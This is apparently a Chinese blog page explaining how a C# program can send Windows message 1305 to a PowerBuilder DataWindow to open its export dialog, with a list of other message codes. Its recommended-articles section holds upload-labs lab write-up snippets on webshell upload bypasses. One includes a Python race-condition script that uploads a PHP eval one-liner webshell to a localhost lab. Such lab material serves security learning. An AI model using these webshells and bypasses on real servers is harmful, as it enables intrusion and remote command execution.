外部程序读取Powerbuilder的数据窗口数据的方法

最新推荐文章于 2025-12-16 13:31:23 发布
原创 最新推荐文章于 2025-12-16 13:31:23 发布 · 9k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#powerbuilder #exception #dialog #api #button #filter

本文介绍了如何通过调用Powerbuilder数据窗口的API来实现数据的导出。首先,需要获取数据窗口的句柄,这可以通过工具如Spy++或SpyLite24完成。接着,利用SendMessage函数发送特定消息1305,即可触发数据窗口的导出文件功能。在C#中,可以创建Win32API类并调用其SendMessage方法来实现这一操作。若句柄不正确,操作将失败并提示错误信息。

一、原理

    PB数据窗口有一个导出文件的函数,通过调用API向数据窗口传递特定的消息,它就乖乖的弹出一个导出数据文件的窗口了。

 

二、实现步骤

     1、获取数据窗口的句柄。使用spy++工具获取,或者使用工具SpyLite24(http://www.asanscape.com/可以免费下载)

     2、调用让数据窗口导出文件的消息。SendMessage(pbdw_handle, 1305, 0, 0)

 

三、C#代码

 

    public class Win32API
    {
        [DllImport("user32.dll", CharSet=CharSet.Auto)]
        public static extern int SendMessage(IntPtr hWnd, int msg, int wParam, int lParam);
    }

 

调用示例:

           private void button_Click(object sender, EventArgs e)
        {
            try
            {

                IntPtr mwh = (IntPtr)Convert.ToInt32(tbPBDWHandle.Text);
                int result = Win32API.SendMessage(mwh, 1305, 0, 0);

                if (result == 0)
                {
                    MessageBox.Show("操作失败!请确定数据窗口句柄是否正确!");
                }
            }
            catch (Exception ex)
            {
                MessageBox.Show(ex.ToString());
            }
        }

 

四、PBDW的其他函数和查看资料

How to manipulate Datawindow without using datawindow functions.

// I test only on PowerBuilder 6.5 build 444

long ll_dw_handle
ll_dw_handle = handle(dw_1)

Function
Power script
RetrievePost(ll_dw_handle, 1306, 0, 0)
Post(ll_dw_handle, 1320, 0, 0)
ScrollNextPagePost(ll_dw_handle, 1318, 0, 0)
ScrollPriorPagePost(ll_dw_handle, 1319, 0, 0)
ScrollToFirstPagePost(ll_dw_handle, 1315, 0, 1) // 1 = first row?
ScrollToLastPagePost(ll_dw_handle, 1315, 0, 99999999) // 99999999 = last page ? pb6 programmer don't know how to get the last page :)
Sort DialogPost(ll_dw_handle, 1309, 0, 0)
Filter DialogPost(ll_dw_handle, 1311, 0, 0)
DeleteRowPost(ll_dw_handle, 1357, 0, 0)
Post(ll_dw_handle, 1307, 0, 0)
Append RowPost(ll_dw_handle, 1357, 0, 0)
Post(ll_dw_handle, 1312, 0, 0)
Post(ll_dw_handle, 1315, 0, dw_1.rowcount() + 1)
Post(ll_dw_handle, 1325, 0, 0)
InsertRowPost(ll_dw_handle, 1357, 0, 0)
Post(ll_dw_handle, 1313, 0, 0)
Post(ll_dw_handle, 1312, 0, dw_1.getrow())
Post(ll_dw_handle, 1315, 0, dw_1.getrow())
Post(ll_dw_handle, 1325, 0, 0)
UpdatePost(ll_dw_handle, 1357, 0, 0)
Post(ll_dw_handle, 1338, 0, 0)
Post(ll_dw_handle, 1304, 0, 0)
SaveAs Dialog Post(ll_dw_handle, 1338, 0, 0)
Post(ll_dw_handle, 1305, 0, 0)
PrintPost(ll_dw_handle, 1303, 0, 0)
Retrieve (yield)Post(ll_dw_handle, 1306, 1, 0)
Post(ll_dw_handle, 1320, 0, 0)
Cancel
Post(ll_dw_handle, 1320, 0, 0)

 

 

upload-labs Pass-08
wanggonghanfei的博客
10-21 493
利用这一点,我们可以上传我们的shell,然后抓包,在包中修改文件后缀添加一个点,来达到绕过。在windows环境下,假设我们新建一个1.php文件,然后在文件后缀加一个。windows会默认去掉那个点,变成1.php。file_name);//删除文件名末尾的点。发现相较于之前关卡,缺少了。
upload-labs Pass-15
wanggonghanfei的博客
10-23 349
根据源码分析,本关卡任然可以使用图片制作的webshell。利用文件包含漏洞直接访问,详细步骤可以查看我。制作图片木马,然后直接上传,准备文件info.php。
upload-labs pass-13
记录自己学习安全知识的笔记, 沉淀ing
10-15 201
这里注意,直接提交是没有作用的,因为POST提交的数据不一致,它还会把我们提交的请求转为十六进制编码提交,我们还需要修改Hex里的内容。我们然后点进旁边的Hex,进行修改。这一关和上一个类似,不过这里是通过POST控制上传路径,我们还是上传一个文件,然后在burp里面改包。找到我们添加的后缀,31,然后在右边的面板中将Code值改为00,然后点击应用就可以了。我们将save_path路径修改一下,后面的1是为了方便定位文件结尾位置。post型00截断,需要再Hex中修改内容。
upload-labs pass-16
weixin_54347738的博客
09-05 339
建议将文件都写在D盘下,否则后面会因为权限问题无法再16进制编辑器中修改文件字段。
网络安全upload-labs Pass-19 解题详析
等风来
08-23 5913
本文介绍了如何通过修改myupload.php文件中的代码,利用图片码绕过文件上传限制,上传含有eval代码的GIF文件,并通过文件包含功能点实现命令执行。文章详细描述了上传过程、获取图片路径、利用文件包含功能点执行命令的步骤,并提供了POC示例。此外,文章还提到可以通过条件竞争的方式完成该任务,并提供了相关参考链接。读者可参考相关专栏和文章,进一步学习网络安全攻防实战技巧。
网络安全upload-labs Pass-15 解题详析
等风来
08-16 5673
使用getimagesize()函数获取图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度,并将其取出的文件类型信息$info[2]与文件后缀白名单进行对比,判断上传的文件是否合法,并将info[2]作为上传后的文件的后缀名。其它操作同Pass-14,本文不再赘述。于是我们仍可以使用图片码上传。
upload-labs Pass1-20 已完结
weixin_46099552的博客
08-14 502
upload-labs
网络安全upload-labs Pass-14 解题详析
等风来
08-16 6016
可知其检测了文件头信息,此时仅抓包修改文件后缀名不可绕过。将1.php与1.png合并为shell.php即可。需写出文件所在路径及期望得到的文件路径。故文件包含、传参执行命令成功。成功得到shell.png。
网络安全upload-labs Pass-18 解题详析
等风来
08-23 5966
作用为:fopen(“info.php”, “w”) 使用写入模式(w)打开了一个名为 info.php 的文件,然后,fputs() 函数将 <?> 写入到打开的文件中。的原理类似,我们可以在上传文件的一瞬间访问该文件,这样文件就无法被过滤及二次渲染。但利用条件竞争时,需要快速进行访问,而手工较慢,因此需要写特定的脚本进行访问或上传。可以知道,后端逻辑代码先上传文件,再进行过滤及二次渲染。说明info.php成功生成,同时该文件包含一句话木马。在点击开始攻击的一瞬间,访问目标文件路径。
upload-labs通关指南
01-22
upload-labs通关指南》是一份针对upload_labs文件上传靶场的详细通关攻略文档。在网络安全领域,文件上传靶场是一个专门用于学习和研究文件上传漏洞攻防技术的平台。本指南不仅涵盖了客户端验证漏洞和多种服务端...
upload-labs19-20以及总结1
08-08
Pass19中,开发者试图通过限制上传文件的扩展名来防止这种攻击,但是他们只检查了保存文件名(`save_name`)是否包含黑名单中的扩展名,而未检查实际上传文件的类型。 以下是该关卡的主要知识点: 1. **文件名...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8847
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2023年全国网络安全行业职业技能大赛-电子数据取证分析师-初赛C卷(15号)-Writeup
Aluxian_的博客
12-11 489
总体要求:根据提供的检材,完成指定电子数据提取。
渗透测试行业术语扫盲(第六篇)—— Web安全专用类术语
qq_39241682的博客
12-09 881
Web是渗透测试的主战场。要在此作战,不仅要懂攻击漏洞(如上一篇所述),更要理解支撑Web运行的基础身份机制、浏览器安全规则以及攻防双方使用的具体工具与载荷。本篇将深入Web安全的“皮下组织”,从维持登录状态的Cookie,到攻击者留下的Webshell,再到防御者的CSP策略,为你揭示这个战场的完整规则与装备图景。
PolarCTF网络安全2025冬季个人挑战赛 wp
lpppp小公主的博客
12-09 977
PolarCTF网络安全2025冬季个人挑战赛复现
网络安全-SQL注入
m0_56970656的博客
12-11 383
SQL注入是一种常见的网络安全攻击技术,攻击者通过在用户输入的数据中插入恶意的SQL代码,欺骗后端数据库执行非预期的操作。这种攻击通常发生在应用程序未对用户输入进行充分验证或过滤的情况下,导致数据库被非法访问、篡改或泄露敏感信息。
网络安全怎么考公?
最新发布
2401_84466227的博客
12-16 488
网络安全专业考公竞争压力相对较小,专业壁垒显著降低竞争比例。建议考生根据自身情况,精准定位目标岗位,系统备考,争取早日上岸。
网络安全思路分享
猪肉炖白菜
12-11 952
开头:获取明确书面授权,定义范围(如域名、IP,排除破坏性测试),符合PCI标准。:若范围允许,尝试横向移动,然后记录发现,包括CVSS风险评分、重现步骤和修复建议。从候选人1的资产识别和漏洞测试步骤,以及2号的授权和OWASP Top 10强调入手,优越方法采用分阶段框架结合明确规则。候选人1的聚合和基线良好,但2号的ML和ATT&CK整合更先进,符合Prophet Security调优指南。候选人1的NAC和分区基础,但2号的MDM和零信任更强劲,符合NIST远程工作指导。端点强制EDR和补丁管理。
网络安全中对称算法和非对称算法的作用和区别
2301_80954266的博客
12-13 295
(高级加密标准)算法就是一种广泛使用的对称加密算法,它提供了多种密钥长度选择,能够满足不同安全级别的需求,在数据传输过程中,发送方使用AES算法和密钥对数据进行加密,接收方使用相同的密钥进行解密,从而确保数据在传输过程中的安全性。$$ E_{pk}(P) = C \quad \text{和} \quad D_{sk}(C) = P $$$$ E_k(P) = C \quad \text{和} \quad D_k(C) = P $$其中 $P$ 为明文, $C$ 为密文, $k$ 为共享密钥。
upload-labs pass21
07-20
upload-labs 项目中,Pass-21 的解题思路主要围绕文件上传时的 **MIME 类型验证绕过** 和 **文件名解析漏洞利用**。虽然未在提供的引用中直接提及 Pass-21 的具体细节,但根据 upload-labs 系列的常见设计逻辑,Pass-21 很可能涉及以下攻击模式: ### 三级标题:MIME 类型验证绕过 在某些关卡中,服务器会通过检查上传文件的 MIME 类型来阻止非图片文件的上传。攻击者可以通过在上传请求中修改 `Content-Type` 字段来绕过该检查,例如将其设置为 `image/jpeg` 或 `image/png`,即使上传的是 `.php` 文件。这种方式常用于绕过前端或服务器端的简单 MIME 类型检测机制[^1]。 ### 三级标题:双重扩展名上传与解析漏洞 服务器端可能使用了不安全的文件名处理方式,例如仅过滤了 `.php` 扩展名,但未对多个扩展名进行处理。攻击者可以尝试上传类似 `shell.php.jpg` 的文件,随后通过某些方式(如 Apache 的解析特性)使服务器将 `.php.jpg` 文件当作 PHP 脚本执行。这种攻击方式依赖于服务器配置不当,例如 Apache 的 `mod_php` 模块会解析最后一个匹配 `.php` 的扩展名。 ### 三级标题:结合 .htaccess 文件实现解析绕过 如果服务器允许上传 `.htaccess` 文件,则攻击者可以上传一个自定义的 `.htaccess` 文件,配置其将特定扩展名(如 `.jpg`)解析为 PHP 脚本。例如,添加如下内容: ```apache AddType application/x-httpd-php .jpg ``` 上传后,再上传一个以 `.jpg` 结尾的 PHP 文件,服务器会将其当作 PHP 脚本执行。这种方式常见于 Linux 环境下的 upload-labs 关卡[^3]。 ### 三级标题:条件竞争与多线程上传 在某些情况下,服务器可能对上传后的文件进行异步检查或清理,攻击者可以利用时间差进行条件竞争攻击。通过并发脚本快速上传并访问恶意文件,从而在文件被删除前完成命令执行。例如使用 Python 脚本进行多线程上传和访问: ```python import threading import requests def upload_file(): url = "http://localhost/upload-labs-master/upload.php" files = {'file': ('shell.php', "<?php @eval($_POST['cmd']); ?>", 'image/jpeg')} data = {'submit': 'Upload'} while True: requests.post(url, files=files, data=data) def access_file(): while True: requests.get("http://localhost/upload-labs-master/uploads/shell.php") threads = [] for _ in range(10): t = threading.Thread(target=upload_file) t.start() threads.append(t) for _ in range(2): t = threading.Thread(target=access_file) t.start() threads.append(t) ``` 此脚本通过并发上传和访问,尝试在服务器清理文件前完成攻击过程。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值